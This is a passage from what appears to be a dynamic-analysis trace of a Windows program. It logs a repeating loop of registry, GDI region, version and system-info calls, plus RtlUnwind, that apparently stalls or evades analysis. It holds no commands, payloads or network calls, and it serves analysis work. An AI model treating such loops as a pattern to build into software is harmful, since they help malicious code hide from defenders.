ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.696] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xda040713 [0017.696] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd004027d [0017.696] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c46 [0017.696] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c47 [0017.696] CombineRgn (hrgnDst=0x1040c46, hrgnSrc1=0xda040713, hrgnSrc2=0xd004027d, iMode=1) returned 1 [0017.696] CombineRgn (hrgnDst=0x1040c47, hrgnSrc1=0xda040713, hrgnSrc2=0xd004027d, iMode=4) returned 2 [0017.697] CreateSolidBrush (color=0xff) returned 0x2100c45 [0017.697] CreateSolidBrush (color=0xff0000) returned 0x1100c48 [0017.697] DeleteObject (ho=0x1100c48) returned 1 [0017.697] DeleteObject (ho=0xd004027d) returned 1 [0017.697] DeleteObject (ho=0xda040713) returned 1 [0017.697] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.697] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.697] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.697] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.697] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.697] BeginPath (hdc=0x0) returned 0 [0017.697] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.697] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.697] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.697] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.697] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.697] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.697] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.697] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.697] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd104027d [0017.697] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdb040713 [0017.697] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c49 [0017.697] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c4a [0017.697] CombineRgn (hrgnDst=0x1040c49, hrgnSrc1=0xd104027d, hrgnSrc2=0xdb040713, iMode=1) returned 1 [0017.697] CombineRgn (hrgnDst=0x1040c4a, hrgnSrc1=0xd104027d, hrgnSrc2=0xdb040713, iMode=4) returned 2 [0017.697] CreateSolidBrush (color=0xff) returned 0x2100c48 [0017.697] CreateSolidBrush (color=0xff0000) returned 0x1100c4b [0017.697] DeleteObject (ho=0x1100c4b) returned 1 [0017.697] DeleteObject (ho=0xdb040713) returned 1 [0017.697] DeleteObject (ho=0xd104027d) returned 1 [0017.697] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.697] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.698] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.698] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.698] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.698] BeginPath (hdc=0x0) returned 0 [0017.698] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.698] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.698] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.698] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.698] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.698] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.698] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.698] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.698] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdc040713 [0017.698] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd204027d [0017.698] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c4c [0017.698] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c4d [0017.698] CombineRgn (hrgnDst=0x1040c4c, hrgnSrc1=0xdc040713, hrgnSrc2=0xd204027d, iMode=1) returned 1 [0017.698] CombineRgn (hrgnDst=0x1040c4d, hrgnSrc1=0xdc040713, hrgnSrc2=0xd204027d, iMode=4) returned 2 [0017.698] CreateSolidBrush (color=0xff) returned 0x2100c4b [0017.698] CreateSolidBrush (color=0xff0000) returned 0x1100c4e [0017.698] DeleteObject (ho=0x1100c4e) returned 1 [0017.698] DeleteObject (ho=0xd204027d) returned 1 [0017.698] DeleteObject (ho=0xdc040713) returned 1 [0017.698] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.698] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.698] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.698] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.698] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.698] BeginPath (hdc=0x0) returned 0 [0017.698] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.698] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.698] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.698] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.698] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.699] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.699] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.699] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.699] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd304027d [0017.699] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdd040713 [0017.699] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c4f [0017.699] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c50 [0017.699] CombineRgn (hrgnDst=0x1040c4f, hrgnSrc1=0xd304027d, hrgnSrc2=0xdd040713, iMode=1) returned 1 [0017.699] CombineRgn (hrgnDst=0x1040c50, hrgnSrc1=0xd304027d, hrgnSrc2=0xdd040713, iMode=4) returned 2 [0017.699] CreateSolidBrush (color=0xff) returned 0x2100c4e [0017.699] CreateSolidBrush (color=0xff0000) returned 0x1100c51 [0017.699] DeleteObject (ho=0x1100c51) returned 1 [0017.699] DeleteObject (ho=0xdd040713) returned 1 [0017.699] DeleteObject (ho=0xd304027d) returned 1 [0017.699] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.699] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.699] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.699] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.699] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.699] BeginPath (hdc=0x0) returned 0 [0017.699] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.699] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.699] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.699] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.699] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.699] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.699] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.699] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.700] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xde040713 [0017.700] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd404027d [0017.700] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c52 [0017.700] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c53 [0017.700] CombineRgn (hrgnDst=0x1040c52, hrgnSrc1=0xde040713, hrgnSrc2=0xd404027d, iMode=1) returned 1 [0017.700] CombineRgn (hrgnDst=0x1040c53, hrgnSrc1=0xde040713, hrgnSrc2=0xd404027d, iMode=4) returned 2 [0017.700] CreateSolidBrush (color=0xff) returned 0x2100c51 [0017.700] CreateSolidBrush (color=0xff0000) returned 0x1100c54 [0017.700] DeleteObject (ho=0x1100c54) returned 1 [0017.700] DeleteObject (ho=0xd404027d) returned 1 [0017.700] DeleteObject (ho=0xde040713) returned 1 [0017.700] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.700] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.700] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.700] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.700] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.700] BeginPath (hdc=0x0) returned 0 [0017.700] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.700] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.700] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.700] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.700] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.700] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.700] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.700] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.700] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd504027d [0017.700] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdf040713 [0017.700] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c55 [0017.700] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c56 [0017.700] CombineRgn (hrgnDst=0x1040c55, hrgnSrc1=0xd504027d, hrgnSrc2=0xdf040713, iMode=1) returned 1 [0017.700] CombineRgn (hrgnDst=0x1040c56, hrgnSrc1=0xd504027d, hrgnSrc2=0xdf040713, iMode=4) returned 2 [0017.700] CreateSolidBrush (color=0xff) returned 0x2100c54 [0017.701] CreateSolidBrush (color=0xff0000) returned 0x1100c57 [0017.701] DeleteObject (ho=0x1100c57) returned 1 [0017.701] DeleteObject (ho=0xdf040713) returned 1 [0017.701] DeleteObject (ho=0xd504027d) returned 1 [0017.701] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.701] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.701] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.701] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.701] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.701] BeginPath (hdc=0x0) returned 0 [0017.701] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.701] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.701] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.701] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.701] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.701] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.701] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.701] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.701] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe0040713 [0017.701] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd604027d [0017.701] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c58 [0017.701] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c59 [0017.701] CombineRgn (hrgnDst=0x1040c58, hrgnSrc1=0xe0040713, hrgnSrc2=0xd604027d, iMode=1) returned 1 [0017.701] CombineRgn (hrgnDst=0x1040c59, hrgnSrc1=0xe0040713, hrgnSrc2=0xd604027d, iMode=4) returned 2 [0017.701] CreateSolidBrush (color=0xff) returned 0x2100c57 [0017.701] CreateSolidBrush (color=0xff0000) returned 0x1100c5a [0017.701] DeleteObject (ho=0x1100c5a) returned 1 [0017.701] DeleteObject (ho=0xd604027d) returned 1 [0017.701] DeleteObject (ho=0xe0040713) returned 1 [0017.701] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.701] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.701] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.702] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.702] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.702] BeginPath (hdc=0x0) returned 0 [0017.702] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.702] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.702] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.702] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.702] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.702] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.702] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.702] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.702] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd704027d [0017.702] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe1040713 [0017.702] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c5b [0017.702] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c5c [0017.702] CombineRgn (hrgnDst=0x1040c5b, hrgnSrc1=0xd704027d, hrgnSrc2=0xe1040713, iMode=1) returned 1 [0017.702] CombineRgn (hrgnDst=0x1040c5c, hrgnSrc1=0xd704027d, hrgnSrc2=0xe1040713, iMode=4) returned 2 [0017.702] CreateSolidBrush (color=0xff) returned 0x2100c5a [0017.702] CreateSolidBrush (color=0xff0000) returned 0x1100c5d [0017.702] DeleteObject (ho=0x1100c5d) returned 1 [0017.702] DeleteObject (ho=0xe1040713) returned 1 [0017.702] DeleteObject (ho=0xd704027d) returned 1 [0017.702] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.702] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.702] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.703] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.703] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.703] BeginPath (hdc=0x0) returned 0 [0017.703] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.703] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.703] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.703] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.703] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.703] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.703] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.703] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.703] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe2040713 [0017.703] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd804027d [0017.703] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c5e [0017.703] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c5f [0017.703] CombineRgn (hrgnDst=0x1040c5e, hrgnSrc1=0xe2040713, hrgnSrc2=0xd804027d, iMode=1) returned 1 [0017.703] CombineRgn (hrgnDst=0x1040c5f, hrgnSrc1=0xe2040713, hrgnSrc2=0xd804027d, iMode=4) returned 2 [0017.703] CreateSolidBrush (color=0xff) returned 0x2100c5d [0017.703] CreateSolidBrush (color=0xff0000) returned 0x1100c60 [0017.703] DeleteObject (ho=0x1100c60) returned 1 [0017.703] DeleteObject (ho=0xd804027d) returned 1 [0017.703] DeleteObject (ho=0xe2040713) returned 1 [0017.703] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.703] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.703] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.703] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.703] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.703] BeginPath (hdc=0x0) returned 0 [0017.703] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.703] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.703] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.703] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.703] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.703] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.703] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.703] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.704] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd904027d [0017.704] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe3040713 [0017.704] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c61 [0017.704] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c62 [0017.704] CombineRgn (hrgnDst=0x1040c61, hrgnSrc1=0xd904027d, hrgnSrc2=0xe3040713, iMode=1) returned 1 [0017.704] CombineRgn (hrgnDst=0x1040c62, hrgnSrc1=0xd904027d, hrgnSrc2=0xe3040713, iMode=4) returned 2 [0017.704] CreateSolidBrush (color=0xff) returned 0x2100c60 [0017.704] CreateSolidBrush (color=0xff0000) returned 0x1100c63 [0017.704] DeleteObject (ho=0x1100c63) returned 1 [0017.704] DeleteObject (ho=0xe3040713) returned 1 [0017.704] DeleteObject (ho=0xd904027d) returned 1 [0017.704] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, 